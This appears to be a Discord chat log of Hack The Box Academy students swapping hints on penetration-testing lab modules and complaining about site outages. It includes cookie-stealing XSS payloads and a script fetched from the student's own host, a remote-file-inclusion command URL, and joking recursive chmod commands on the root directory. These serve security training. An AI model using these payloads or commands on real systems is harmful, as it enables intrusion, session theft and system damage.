#modules
Will reversing be on the exam? It seems odd that they added a new topic after the exam was already created.
Everyone who has passed it says that whatever is in the modules can show up on the exam. That said, it's a recent addition, so probably less likely. You can never 100% count it out though.
Worst comes to worst, you search ".net binary reversing ippsec/0xdf" and find some walkthrough that they did and follow the steps, they probably wouldn't design any thick clients or binaries that are overly complex, since that's not really what the exam is for
Take anything I say with a grain of salt- all I know is what I read in Discord, I haven't taken the exam
I wish they taught more fundamentals on RE if they are going to include it. I feel like all I would learn from this module is how to pass this particular module.
I found the video from ippsec.rocks...will definitely be going through it tomorrow.
that section is a 1:1 copy of the Fatty box official writeup
the ippsec video on that box is great for debugging but i used 0xdf writeup for this (more quick and easy)
I saw something mentioned about Fatty on the VM...so, I should just look up the Fatty box official writeup...okay, awesome, because I don't know how I would get past this on my own
I love how they include material from an Insane level box as if we are all supposed to get it...In my experience so far, it feels like lots of InfoSec training companies assume their students already know as much as the teachers
so far I think this is the only section that has done this, so you should be good for the other modules
I see, since there are two modules under the attacking thick clients sub-section...you and @vital adder are life savers!
After the AD modules, for the most part everything has been smooth sailing, except for these thick client modules
also in my opinion the main reason this section sucks ass is because the goal of the box is to get RCE but the goal of this section is only getting admin in the client, but the section still shows the whole process from start to getting RCE, which is confusing
yea this channel gets that a lot 🤣
So for "Attacking Thick Client Applications" I should be looking at the Fatty writeup and for "Exploiting Web Vulnerabilities in Thick-Client Applications" I should look at the PivotAPI writeup?
the Restart-OracleService.exe binary on Attacking Thick Client Applications is from the PivotAPI box and the fatty-client.jar file on Exploiting Web Vulnerabilities in Thick-Client Applications is from the Fatty box
Okay, that makes sense because the ippsec video seemed to be on the Restart-OracleService.exe
I like to see it as making the stuff in Insane boxes not seem as insane, but for people who have zero rev experience, the section is more confusing if anything
Is it possible to dm someone about Whitebox Attacks "Remote Code Execution"
Hello! I'm having trouble on the Footprinting module. Sqlplus doesn't seem to exist on the Pwnbox, I keep getting command not found. I tried searching the system for the binary using find and it didn't find anything.
Do I have to install sqlplus myself?
Yes just copy/paste the commands they give you into a bash script
thank you!
hello everyone. I've been stuck on Password Attack Hard Lab for a couple of days now. I was able to find david's credentials and download the .vhd file but I can't mount it or even decrypt it. Would anyone be so kind as to give me a hint?
@inner talon mount the file in windows
and as for decrypting the .vhd file, the answer is somewhere in the Protected Archives module
Thanks 🫶
Okay, I think I'm a little stupid. I used a wrong tool, darn me.
hello everyone, I've been stuck on Password Attacks for Password Mutations
"Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. "
I already tried to use hydra, but I couldn't get anything
I also created the custom rules like a becomes 4, etc.
can anyone help me? thank you and have a nice day 🥰
Attack a different service from ssh
Also use the custom.rules from the resources file
Do not create your own rules
The correct mutated list is ~95k lines
ah I see.. thank you for your help 😅
I thought I needed to create it by myself
Sqlplus is Oracle's tool that lets you interact with an Oracle database from the console. Go to YouTube and find a video, it will help you install it :]
I am having a bit of a technical issue with the Windows Privilege Escalation module ... I am at the Citrix Breakout but the machine is so slow that either it times out or just lags a lot, so I have to wait an eternity to type one letter ... Is there a tech issue with HTB now?
I'm doing the Windows privesc module and Citrix Breakout section. Why am I stuck here?
at least you got there ... I am unable to login due to how slow the system is
Try to change vpn server
is htb working for you? 
Hi guys, I need the best subscription plan within HTB Academy to open modules <°
You are supposed to paste the path in the File Name field
yes
Yes I did
Are you sure?!
yes
I was in module yeah think down

Yes
ah yes i'm tired
same lol
10000% sure
a random hecker hecked them
loading for a while
I just submitted the last flag and HTB is down
HTB isn't working either
HTB pwned???
Same
is it ddos
breakthebox
May be change , and add some futures🥶
HTB pwned indeed
Hhhh
but it's a Cloudflare domain
Who got the root flag
🙃
Root flag? You mean Domain-Admin!
Yeah Lol
It's Cloudflare 100%
cause I got my drug from Amsterdam
Who's been Hacking HTB??? lol
Probably the russians again ffs
Ok , any one get access in htb add for all cubs free 😹
not even supporting our education
just got to a coffee shop 10 mins ago to try and do a few hours in peace
darn it
Definitely, It has become the Destroyer of Labs
some kali linux users probably
tryhackme hacked them ig
Nothing wrong
They are not that good lol
nice
Need to speak to a person? Learn how to reach our support via the Main Platform.
Just submit tickets through the help portal
¯\_(ツ)_/¯
can I call this Social Engineering
I am from North Korea
narrowed down to 70mil odd people 😉
i try to learn hacking for the government of korea
Social Engineering *
North hihi*
jk im NL servers too
Main site was fine
why are they not doing sudo systemctl * up
labs is down
even the main page is down
everything except support is down by the looks of it
no, it's working now
Yep, down for me too
no, it's not
No
Just give it a few
jesus, I just want to go back to hell (htb modules)
I want to get that damn flag
Ok, it just loaded 😄
WE NEED IT BACK UP YO NO CAP
back up for me
it works
same
it worked...
yay, time to suffer again. It was a pleasure guys
anyway...
and in all that time my target still didn't spawn....
kali linux user 
Ah you are also at the password module
I got the creds for the LSASS module, but then it shut down
Lol I did the exact same thing
noob
anyway
Session Control
#Tools/tmux/session-control
Create a new session:
tmux new -s <name>
Search through history:
Ctrl + d, [ then hjkl for looking through.
And the use of Page Up and Page Down
Copying can be done with SPACE and ENTER
Paste this with: Ctrl + d, ]
Create a new Window(session):
Ctrl + d, c and Ctrl + d, ',' to rename it.
Switching sessions:
Ctrl + d, <1-9/0> the number of the session.
Nested sessions:
tmux ls shows all sessions.
tmux attach -t <session> attaches the session
Detach a session:
Ctrl + d, d
Join windows/sessions:
Ctrl + d, s + <session-id>
Output history in a log file:
Ctrl + d, alt + shift + P
Show all Tmux bindings:
Ctrl + d, ?
Start a timer:
Ctrl + d, t
Splitting Stuff
#Tools/tmux/splitting-stuff
Horizontal split:
Ctrl + d, "
Vertical split:
Ctrl + d, %
Move split sessions:
Ctrl + d, <arrows>
Zoom session:
Ctrl + d, z
Move windows:
Ctrl + d, } to the right
Ctrl + d, { to the left
Change layout looks:
Ctrl + d, space
Terminal Tricks
#Tools/tmux/terminal-tricks
Cycle through history:
Alt + .
Shortcuts:
Ctrl + a begin line
Ctrl + e end line
Ctrl + arrow word by word
Ctrl + D Exit
Ctrl + L Clear
some tmux notes
learn it in the mean time
Nice but who cares
😦

ok want vim notes?
I prefer nano
only pro hackers use vim
at least I'm glad no one uses emacs
I use Microsoft Word as my IDE
have to have OSCP to be able to close that thing
:q
im oscp certified now
vim has a lesson binary if you install vim
vimtutor
i think
It's back
Hi @fathom pendant. Regarding the question in Attacking Common Services easy lab "You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer." I tried the following:
- Used the smtp-user-enum tool and found a username starting with f.
- found what appeared to be default credentials, first tried to log in with them using mysql but was not successful; an error appeared saying that the password field was empty.
- tried brute forcing each username found with the password list provided in the resources section on the ftp and mysql ports but this was also unsuccessful.
I saw the mysql reverse shell discussion and correct me if I am wrong. I need to be authenticated before attempting this? or does it work straight from the URL bar? Any hints would be appreciated 🙂
nice. goodbye everyone again
if you have Fs creds, maybe retry step 2?
What hashing protocol is capable of symmetric and asymmetric cryptography? isn't it TLS/SSL?
Hashing protocol?
yah
symmetric and asymmetric encryption,
so I don't think that's a hashing protocol
Only have the username of f, that is part of the problem. Tried brute forcing on mysql but after a certain number of tries it times out.
if you have the username can you try bruteforcing this?
DM me if you want, I did this one on like Monday
So I tried to crack the AES hash but I can't. Then I logged into SMB using the ticket, but I am supposed to login to SSH, help lol
which module and section are you on?
Password attacks - Pass the Ticket (PtT) from Linux
Question 5? Hint: wrong file
What question is that again?
htb down again ?
yup
yep
wth
ayo btw What group type is best utilized for assigning permissions and rights to users?
isn't it SG
about to punch my screen as my proxy wasn't working, then I refreshed the page
or Role-Based Access Control
RBAC i think? Using theories such as just in time?
idk d*ck this AD i hate it
or just 777 the entire drive 😉

god have mercy
might as well add a SUID while you're at it
does anyone know the cause, like what's going on
never forget to chmod o+x
why is it down 2x
sudo chmod / 4777
chmod -R u+rwx /
beautiful
backup
works again
can anyone see why this isn't working?
The pivot host is available but rdesktop isn't connecting to the port forward?
tried 2 different ports to connect to
Listen IP doesn't match your connect IP.
isn't the listen host the attacking machine?
The listen address is the IP interface to listen on
right yep that works, cheers
thought that was the IP it's looking for the incoming connection from,
thanks

Pass the Ticket (PtT) from Linux - The only keytab I've found is ||/home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt ||
And apparently that's not the one I am supposed to use
I've tried ||find / -name *keytab -ls 2>/dev/null||
And I also found these, but I can't use any of them
if i remember right you can only see keytabs as the user that created them unless root
have you tried responder?
I don't see how that would help
I've found one hash
But I can't use it
WAIT
Lmao
I am stupid
No
hi all, I'm in the module HTTP Attacks and I'm stuck in the section HTTP Response Splitting
pretty sure when you connect to Responder it can dump the svc hash, but as you got it, try PtH or cracking it
I was thinking about doing pass the hash, but I can't cuz I am supposed to login with SSH
someone could give me a tip, if possible?
I tried cracking it
Didn't work
Aaaa
Wait
did you see what there may be in that "folder"?
DOWN AGAIN ?

You have to add the UNC path at the bottom under the 'File name' tag


!
their domain is acting weird "academy.hackthebox.com"

I got it. Thank you dude!
Welcome...
May add some futures, and then return
features?
I believe so, I cannot access it either
Yeah it died
but the status website says it's operational: https://status.hackthebox.com/
It probably happened just now
probably not updated the status yet
it's very slow
😭
Any one from htb team here ?!
looks like it came back, I can browse it again
can confirm
The site is working fully, without any error 😕
Hello
I'm having trouble in the Documentation and Reporting module. I grabbed the git repo for the tmux plugins and I copied the .tmux.conf file to the right location and gave everything rwx permissions. But when I try to load my plugins I get "/home/kali/.tmux/plugins// is not writable!" Has anyone else had this problem and found a solution? Alternatively, is there something better than tmux for logging terminal sessions?
UPDATE: I ran 'sudo chown -R kali:kali /home/kali/.tmux/plugins/' which fixed it I guess, probably not the best way but it's a way?
"Alternatively, is there something better than tmux for logging terminal sessions?". I'm not sure this is what you're looking for but have a look at script
Sorry, can you please tell me what wordlist you used to brute force on the vhd hash? the ones I tried didn't work
The module provides lists. Try either this list or the list you have customized in the module
DOWN AGAIN
down for me
You are talking about the HTB site? just tried to get in too.
SOMEONE GOT THE ROOT SHELL THATS WHATS GOING ON
RIP
Hello guys, I'm blocked on the module "ATTACKING WEB APPLICATIONS WITH FFUF", skill assessment at the question "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?".
I got the right page (with the 'You don't have access!' message) but I can't validate it.
Is the format http://domain.domain.htb/path/to/file.ext right for the answer ?
Is it down?
the academy.hackthebox.com site? No, it returns that I do not have the right answer when I try to validate
@wise flare no, it's not like that
The instance and the target
The instance no and the pwnbox, I use my own VM
@wise flare do you have "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains" ?
it's important
yep, one little help
it's one that's different
and unique from the other two
and the format is http://xxxxx.academy.htb:PORT/xxxxxxx etc., the hint they give you
Hi all
someone could help me with the section HTTP Response Splitting ?
I'm stuck on this question: Try to use what you learned in this section to steal the admin user's cookie via XSS.
I have encoded the special characters multiple times to bypass the firewall, but nothing
the idea is to pass this GET /?admin=/?target=http://10.10.14.x:9000/script.js HTTP/1.1 to the admin, and when the admin accesses it, it will load my XSS that will steal his cookie
but there's a firewall that I need to bypass, the hint is:
Hint
Certain special characters need to be URL encoded multiple times. There is a firewall in place that prevents the admin user from accessing any external endpoints!
no, just use the port they give you
btw, that will take a while
you can curl or just go to the webpages
did you know that the OSI model has 7 layers? @wise flare
you understand
(replaced to validate the answer on academy.hackthebox.com)
Does anybody know how to solve this problem in "Attacking Coldfusion" in Attacking Common Applications?
It doesn't get the shell, it keeps listening... (parameters should be fine)
What are people's OS preferences, Kali or Parrot???
I have both but I'm finding I need to install more on Parrot and even can't install some things on Parrot
For that exact reason I like kali more
KALI
I don't take notes of the exercises I do, do I have to recrack the password? If I remember correctly it will take me 30 minutes and aaaaaa
Did you not submit the pw in the previous section?
No
I submitted a flag, but I had to get the password to get the flag
Ok
Recracked it
it was faster than I remember
lol
I use Kali and I am satisfied with it. Never used Parrot before so have no opinion on it.
Can someone tell me how long the promo for silver annual -100 eur will last?
Cuz I have rent on 10 September
Idk what's happening, the commands don't work for me 💀 🥲 in "Attacking SQL Databases"
That first SQL command should return a list of users you're able to impersonate. Since it doesn't return anything, you can't impersonate anyone.
@trail leaf that's the problem right there, in the exercise they guide you based on that, and asking other people on the community that's the way to go. So why isn't it working for me 😭
What does this mean?
We can view which privileges we have using the SHOW GRANTS command be discussed later.
Can someone help me? I tried with all the subdomain wordlists
You need to find all zones
I think the sentence means that this command will be discussed later.
What exactly have you tried?
All the wordlists in SecLists/DNS with the inlanefreight.htb domain
hello, does anyone have an idea what could be happening here:
╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack
╰$ cat ssh.hash
id_rsa:$sshng$1$16$F1C2E21F3CF7BDF460FB56C7D16911F2$1776$b2a5e7a6de9f3785208b9e39086c8f5a07...SNIP....89b922aafeba78ad22cd50bf9252a04941166e2039d55dc8a4a9268d5930d4
╭─linux@samsung in ~/Documents/HTB/Academy/PasswordAttack
╰$ john --wordlist=rockyou.txt ssh.hash
No password hashes loaded (see FAQ)
I genuinely don’t remember using the impersonate stuff there specifically, and based on the answers I have written down, you don’t need that for the exercise
That said, they probably should have a user you can impersonate just for practice
Why?
This zone allows a zone transfer. It gives you all the data voluntarily.
oh shit, true. I'm so dumb
your john may be out of date or the key you are attacking may be unsupported, though you'd see a message if recognized and unsupported
add --format=SSH to your command maybe and see if that changes the behavior
ok, ty, I'm gonna try it
hey guys can I ask you
I bought an Academy gift card and I want to buy a Platinum subscription with that money, how can I do that?
anyone !!
I have used both, Parrot is much more stable on older hardware. I can do evil twin using my integrated wireless adapter, which wasn't possible on Kali
can someone answer me
currently using kali on my PC and Parrot on laptop
Can anybody guide me in the right direction? In "Attacking Common Services - Easy" I can't get a valid username when I try the usernames.list provided, and then when I try a list from SecLists I get a lot of "valid users" that don't work, like "bob, public, demo...". Please, if you could help I'd appreciate it
good day friends, I am at SQLMap Essentials case 6, I spent hours without a hit, it says that col is not injectable and starts with other parameters, I tried with --level=5, --prefix='%27%29' and --prefix="')", any hint please
╭─gsbuosi@samsung in ~/Documents/HTB/Academy/PasswordAttack
╰$ john --format=SSH --wordlist=rockyou.txt ssh.hash
Unknown ciphertext format name requested
╭─gsbuosi@samsung in ~/Documents/HTB/Academy/PasswordAttack
╰$ john --wordlist=rockyou.txt ssh.hash --format=SSH
Unknown ciphertext format name requested
Yeah, looks like your john is very out of date
or potentially it was built with limited environment?
how can I know if that is true? and how can I update it?
either grab binaries from the openwall website or build from the repo?
yesterday at night I did this:
git clone https://github.com/openwall/john -b bleeding-jumbo john
cd john/src/
./configure
make -s clean && make -sj4
yeah, looks like you built in a limited environment then
not the right place #job-postings
when you ran ./configure it should have shown the features that were enabled/disabled based on your environment
ok, how can I fix it?
you need to resolve those environmental issues
holy moly ....
can I DM to not make noise here?
actually it might be good to do here in case someone else has the same issue
that way they can search for the answer
ok, got it
when you say environment issues, do you mean this:
Configured for building John the Ripper jumbo:
Target CPU ......................................... x86_64 AVX, 64-bit LE
AES-NI support ..................................... run-time detection
Target OS .......................................... linux-gnu
Cross compiling .................................... no
Legacy arch header ................................. x86-64.h
Optional libraries/features found:
Memory map (share/page large files) ................ yes
Fork support ....................................... yes
OpenMP support ..................................... yes (not for fast formats)
OpenCL support ..................................... no
Generic crypt(3) format ............................ yes
OpenSSL (many additional formats) .................. yes
libgmp (PRINCE mode and faster SRP formats) ........ yes
128-bit integer (faster PRINCE mode) ............... yes
libz (7z, pkzip and some other formats) ............ yes
libbz2 (7z and gpg2john bz2 support) ............... yes
libpcap (vncpcap2john and SIPdump) ................. yes
Non-free unrar code (complete RAR support) ......... yes
librexgen (regex mode, see doc/README.librexgen) ... no
OpenMPI support (default disabled) ................. no
Experimental code (default disabled) ............... no
ZTEX USB-FPGA module 1.15y support ................. no
Install missing libraries to get any needed features that were omitted.
Configure finished. Now "make -s clean && make -sj4" to compile.
Install missing libraries to get any needed features that were omitted.
yes, that would be part of it
however it does look like you have OpenSSL, which is the dependency I would have expected for the SSH format
so perhaps that format is in experimental still
though I wouldn't expect it to be
ok, my main concern is how I install missing libraries to get any needed features that were omitted.
from there, i would make clean, and make again
and see if the format is present after
also, looking back at your commands
Just finished Password Attacks:
- Very interesting course that introduces a lot of AD concepts, alongside passwords
- I felt like the course was much more difficult than the skill assessments
Passwords are still the primary method of authentication in corporate networks. If strong password policies are not in place, users will often opt for weak, easy-to-remember passwords that can often be cracked offline and used to further our access. We will encounter passwords in many forms during our assessments. We must understand the various ...
you ran john from an installed path
and you compiled john to a local binary
so you are probably running some ancient installed version of john that is different from the locally compiled binary
which will cause even more confusion/conflicts here
when creating a reverse shell with the pwnbox, what IP do I have to put in the script? I used hostname -i to get 127.0.1.1 so a localhost IP and the reverse shell did not work
module is Getting Started - Nibbles - Initial Foothold
Use tun0 ip
ip a, see tun0 (your vpn interface IP)
thanks
Hi, does anyone have problems with the first asset in ABUSING HTTP MISCONFIGURATIONS? I tried different payloads like:
<script>window.location.href = 'http://94.237.48.48:39725/index.php?language=pepe&content=test';</script>
<script>var xhr = new XMLHttpRequest();xhr.open('GET', 'http://94.237.48.48:39725/admin.php?reveal_flag=1', true);xhr.withCredentials = true;xhr.send();window.location.href = 'http://94.237.48.48:39725/index.php?language=pepe&content=test' + encodeURIComponent(xhr.responseText);</script>
But it doesn't work
I have been able to verify that even the admin does not enter in http://94.237.48.48:39725/index.php?language=de
why is the SQL Operators section AFTER this question? https://academy.hackthebox.com/module/33/section/191
😭
Hey!
I wonder if someone can help me. I’m looking at the IPMI section of the Footprinting module.
In the output from nmap, how can one identify if anonymous authentication is enabled?
Would it be under:
PassAuth: anonymous_user
Or under UserAuth?
If it says “UserAuth: null” what does that mean?
Similar to this:
every time i dump hashes and see "mrb3n" account hash, the urge to push challenge through my 🥜 cracker 🤣
RDP and SOCKS Tunneling with SocksOverRDP
I have loaded the dll and turned off Windows Defender. Why am I getting this error??
As has been answered COUNTLESS times in this channel: there is another protection service that runs in real-time
Not powershell RealTimeMonitoring?
Real-Time-Protection
Yes I had already turned real time protection off and Set-MpPreference
More specifically (just to be sure) which system are you trying to access, and which are you on?
There are 3 systems, you have creds for all
Foothold, jump(1), target
oh is there a jump between the foothold and target?
right got it, was getting confused
cheers
was trying to go pivot > target, but I get what it's asking now
After that it's pretty straightforward
cheers
Hey folks, looking for some help on the Footprinting Lab - easy
I am able to ftp in to the proxy 2121 and see the hidden files and folders using ls -a
also changed the permissions to read, write and execute
but I am unable to download them to my parrot vm
Check the permissions for the folder you're downloading to
What is that drive link
trying to share a snip of my screen
Thats better, thank you
I tried downloading using get and mget
nada
what dumb step am I missing here?
What directory are you launching ftp from? Is it a restricted directory like root?
yeah the error is telling you it's from the local side
ok, how was attacking common services -medium easier than easy? Rhetorical question, but if there is actually a narrative to this, be interesting to hear.
Doing Abusing HTTP Misconfigurations: Password Reset Poisoning { https://academy.hackthebox.com/module/189/section/2014 }, and after forwarding the request to interactsh.local I am able to see override headers such as: X-Forwarded-Host, X-Forwarded-For, X-Forwarded-Server, and the hint points me toward utilizing them
and I just don't know how to do so, and I have tried a couple of things with no success
any help is well appreciated !!
Because easy puts you in the mindset of where you need to be
nah they're just flipped for some reason
Hi Guys! I'm having issues with "Pass the Ticket (PtT) from Windows". On the very first question I can't connect via RDP to the IP assigned with the provided credentials. I did reset the IP multiple times but no luck :S how can I get help to solve it?
Either way it made me do a lot of research and learned many new things.
Solved
I'm working on Footprinting/SMTP
I'm struggling to get nmap to accept more than one argument for scripts.
||nmap --script smtp-enum-users --script-args userdb=/home/users.lst,smtp-enum-users.methods={vrfy} 10.129.253.190 ||
It seems to recognize that there are two arguments, but it only ever uses one of them.
I resorted to going over the list manually to finish the exercise 😦
I'm only using one. But two arguments
hello guys, I'm using a Mac with an M1 chip; now I want to install Kali Linux on my host. Is there any way to install ARM Kali on my host machine?
I tried to install ARM in UTM but it was not installed
--script-args smtp-enum-users.methods={VRFY}
I believe that is the only arg you need
What about the user list? The correct username isn't in the default list
It's supplied in a file as part of the exercise
sudo nmap -p25 --script smtp-user-enum -M VRFY -U /usr/share/dirb/wordlists/big.txt -t 10.129.42.195 -v
It isn't that wordlist from memory
I have this in my notes trying to remember how I solved it
but I believe the syntax is similar to the above
Interesting. That is not the syntax I found on nmap.org
https://nmap.org/book/man-nse.html
Shows the syntax. Maybe I need quotes around everything
But in the image I sent, it appears to recognize both of them, so I don't know what I'm doing wrong, really.
I just checked; you want to use this wordlist
/usr/share/dirb/wordlists/big.txt
if you figure out the syntax you got is
The word list is supplied in the exercise
sure it is 🙂
I've already done it manually for the answer, I just want to figure out how to get it working.
It is. It's the resources file for that module. The hint even tells you to use it.
I had to run it with the big.txt wordlist and finally got it
But I can't get nmap to use the vrfy method and the list at the same time which annoys me
You can just use smtp-user-enum.py
BTW
Script arging in Nmap is just a needless pain
smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1

Is that what we are looking for? I did this last week, just took horrible notes
That's what I recall doing
Where did you find -M -U as being usable?
I believe I managed to get Nmap to work after several hours of trial and error. Which felt pointless
-M == method
-U == {username.list}
I get that. Not what I'm asking
That syntax isn't on nmap.org
How did you find it / where can I see it?
It should be installed and be in your default path just Start typing smtp-user- and hit tab
Hey did you solve it? Can I DM you?
I have admin rights via CMD prompt and PS. How can I check the NTLM hash of a certain user?
@cunning obsidian dms?
mimikatz?
i am having trouble copying it to the target windows machine
I already used scp to put it on the linux attack host
does anyone know why the ssh to the target box from the pwnbox is so unstable? Every time I establish an ssh session and try to set up a python web server it freezes; unfortunately I can't crack the hashes with my Linux machine and I'm using the HTB pwnbox but it's driving me nuts.....
I'm trying to get the clear text pwd for a user with the reversible encryption enabled
Hi All,
Hope someone can help me in "Shells & Payloads - The Live Engagement - Host #1"
After RDP to the Foothold system, I can't see any browser application in Parrot OS. Kindly let me know if this is expected.
Type firefox in terminal
@lone hamlet you have to RDP to the IP that they give you, and then you can start attacking from that machine
@lone hamlet the IPs that you must attack are in the Target Hosts image
@lone hamlet and don't forget the hints, they're very important
In the web attacks module, Local File Disclosure.
Attempting to read the connection.php file
It looks to me that the expect command is disabled because I cannot even do basic commands like id or whoami.
The hint suggests using PHP filters, which suggests that if you obfuscate the command it should work, but I cannot get anything going in my favor.
Some assistance would be greatly appreciated.
File disclosure does not equal code execution. You can read files with it but you can't run commands. The idea is that you can use it to read sensitive data (like the source code or files containing credentials like a connection.php) and then do something with that new knowledge
I do understand that but there is also in the same section parts about "Remote Code Execution with XXE"
And with the IP of the target machine being accessible on the VPN compared to all the other tasks being an online task - that suggests towards the information given in the RCE part of this section
and of course the standard: as soon as you submit to Discord you work it out yourself. I swear I submitted the read w/ base64 thing soooo many times.
but the hint hints towards using php://filter/ no?
but now it suddenly works =/
haha, maybe a typo somewhere
More than likely, appreciate your help anyway mate 😄
Identify if it's possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...}) I am stuck here for a long time
could you give more context? Were you able to perform a "zone transfer"?
i use the dig axfr inlanefreight.htb @rustic sageurl
anyone on SQL injection fundamentals.. Just asking for help on how to log into the inlanefreight on the skills assessment
from the output got from the zone transfer did with dig, if everything went in the right way, you should be able to see additional "targets". Proceed from there
The lesson also talks about a different (similar) zone transfer
why am I getting ldap_sasl_interactive_bind: Can't contact LDAP server (-1)
when running ldapsearch
Hi can someone give me a hint for "Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer." from INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC. I tried different search queries but nothing seems to work.
i am moving on , i can't find it
I can't crack the zip hash, I've tried 5 different wordlists
hi in Kerberos Attacks - Skill Assessment I got the initial credential but I cannot connect in any way to server01 to enumerate the domain. Can anyone help with this??
But I guess I'll just have to try harder lol
5 lists?
A list is provided in this module. In the course of the module this list is edited.
So there is a maximum of two lists you can try
AAAAAA
I remember now
I changed my mut password list
Yes, i made it 400 lines instead of 94k
lol
Why 400?
Because I changed it to bruteforce the kira user
Lol most suggestions were to remove the first 17k
Then create a copy and change it lol
And I forgot to change it back, so i did hehe
Yes indeed, I've got the flag now xd
has anybody else had problems using ligolo-ng on the first jump box of "attacking corporate networks"? - it seems to completely strangle the poor thing
when to use HTB and HTB Academy effectively
which module and section are you on? also I did use that tool for Offshore so if you need help with that feel free to dm me
go to htb after full job role path or after modules
Attacking Enterprise Networks - doing it blind
nice, same, but I haven't redone my sucks-ass note for it so let me give the pivoting thing a check
I'll just use ssh for now
sorry for the wait but I got a working ligolo-ng agent on the jump box and everything seems to be working fine for me (without root)
thank you very much
if that screenshot alone helps then np 👍 but if you still need help with that feel free to shoot me a dm
it told me its a me problem and not a box problem
also I did write a quick "section" on using ligolo-ng double pivot but the head of the academy hasn't replied to that ping, so if you or anyone want to have a check and give me some feedback shoot me a dm
If this is too much information, I’ll delete the post.
Remember to have a look at the cheatsheet that goes along with the footprinting module, have you tried all the commands for the FTP service?
need some help for the Exploiting Web Vulnerabilities in Thick-Client Applications
I have decompiled the jar file using JD-GUI, but when I compile the .java file, it won't work
shoot me a dm
yo guys, i got stuck on this question in Linux fundamentals: Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
it tells me that the address is unreachable
what can i do?
can you paste the curl request?
Thanks a lot
i dont quite understand what do you mean
do you mean the output it gives me after it tries to reach the web?
the command
just simple "curl https://www.inlanefreight.com"
well it should work
I tried to bruteforce user root on password skill assessment easy, it didn't work (bruteforcing root on ssh) and bruteforcing all the usernames with the mut wordlist for ftp (nvm, crackmapexec didn't work that time, now it does)
Hello everyone,
I've been working on the password module for the past five days, but unfortunately, I'm facing a challenge due to the ***** RDP connection constantly resetting every second. This is causing a significant disruption in my progress.
Attacking Common Services - Easy -> I'm on the final step so I upload the shell, now how can I open it? When I go to http://targetip/shell.exe it just downloads it, any hint? Maybe it's an easy step but I've been on this for hours, can't think too much xd
You should check the supported languages for a webserver. I don't think a webserver can execute a .exe file.
If the webserver is able to run php then get a php shell, if it runs aspx then get a .aspx shell
yeap got it, like i said to many hours on this xd thx 😄
I lost my temper
I am afraid I may break my laptop
Maybe it's your RDP client, have you tried changing it?
next time just bang your head against a wall 🤣
jk but which section and question are you on?
ooooh really? Do you think I didn't change it
Password attacks
i mean the section and question?
Password attacks is too lengthy lol
from the rdp thing i'm guessing question 3 on Network Services?
some of the sections are too damn long but for some of them you can cut things like the first 17K passwords off to make it faster
I am doing the easy skill assessment and I have no clue what username is available
nO
Credential windows Hunting
so i am trying it with the short list (203 passwords per user)
if you have a Windows machine use it cuz it will use your GPU while cracking the hash, which makes it much quicker than in a VM
oh i see my bad
oh ok which question?
have you tried increasing the threads?
something isn't right here
I tried using crackmapexec and it took like 2 minutes to scan the 97k passwords for all the users, but none of them hit
so now
I am thinking that i was doing the scan too fast
so i am doing a slower one
with the 200 passwords
And indeed
I got the password just now
Lol
hey wtf
even when i tried to connect using winrm
it took 3min
and every command hangs
wtf they should extend my voucher 1year
```
S C:\tools> ls
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
Error: Exiting with code 1
```
I am considering changing my major to become a nurse,
first, if you are having connection issues make sure you don't have both your VPN and the Pwnbox on at the same time. If you are using the VPN try changing the VPN server, and if you are on the Pwnbox, HTB Academy recently had some downtime so things may be a bit slower than normal. Finally, if you have Silver Annual you have 1 on 1 tutoring, so if you suspect the issue is an internal one you can discuss it with your tutor
or a doctor like johnny sins
I have no idea what you mean by that, but if the spoiler thing is that you have to run that command against the DC for the user in the question, then there are other ways of finding the user, not the exploit part
also if you can't discuss this without spoilers then feel free to shoot me a dm
Password attacks easy, I cannot find root's password (||I am guessing that I am not supposed to brute force since I got the user mike||)
I got nothing from this scan lol
hint do some basic enum for privesc
aaaa ok
Hello, I am currently on the File Inclusion module and the SMB portion does not seem to work for me. I have looked through the past comments and none of them are working. Can someone point me in the right direction? I am using this command: http://<SERVER_IP>:<PORT>/index.php?language=\<OUR_IP>\share\shell.php&cmd=whoami I started impacket and made the directory called shell and copied the php file into it. I have also tried: http://<SERVER_IP>:<PORT>/index.php?language=\<OUR_IP>\shell.php&cmd=whoami taking out the share directory. Is there something I am missing? Thank you in advance for your time.
https://academy.hackthebox.com/module/145/section/1295 Server-side Attacks - Nginx Reverse Proxy & AJP
Is there someone I could dm about some doubts please? I don't get how it works
sure shoot me a dm if you still need help
which section are you on?
Anyone had issues with ssh service breaking on tunneling using icmp? I can ping the box but can't ssh in and my ssh session I had had died. Reverting the box allows you to login again for a couple of mins before breaking. Tested using kali vm and using the parrot attack box.
Hi, I am on the Remote Code Execution/ Remote File Inclusion (RFI)/ SMB section.
try an HTTP server instead of an SMB section
also it's not a SMB section
first you don't have both the pwnbox and your vpn on at the same time right?
I do.
hint ||history||
yea that's the issue
I used parrot to compile ptunnel, as you get compatibility issues compiling on kali
Thanks mrtom
I've checked the bash history and found nothing of interest
just some ||dickens|| file
lol
hint: if you found something that can be used as a password then that's the Fing flag
This worked. Thank You
yea you may want to remove this and the directory listing screenshot because of the spoiler and shoot me a dm with the stuff you found in the ||history|| file
Same. I finished it earlier this week after a bit of time. Research and syntax checks, as well as further searches on what I can do with the url got me to the finish.
Anyone around that has done case 5 in the sqlmap essentials module, the Attack Tuning section?
I've managed to get content to dump, but my flag is not being accepted, want to run what I have by someone and confirm if this is indeed incorrect...
DM me.
😭
I don't get it https://academy.hackthebox.com/module/33/section/799
I try following along and use admin'-- as the username and I get an error. Something so simple like this and it doesn't work
ITS RIGGED
Relax, you're just not thinking about what's going on behind the scenes. The goal of SQL injection is basically rewriting the query the app is making to the database to return something else.
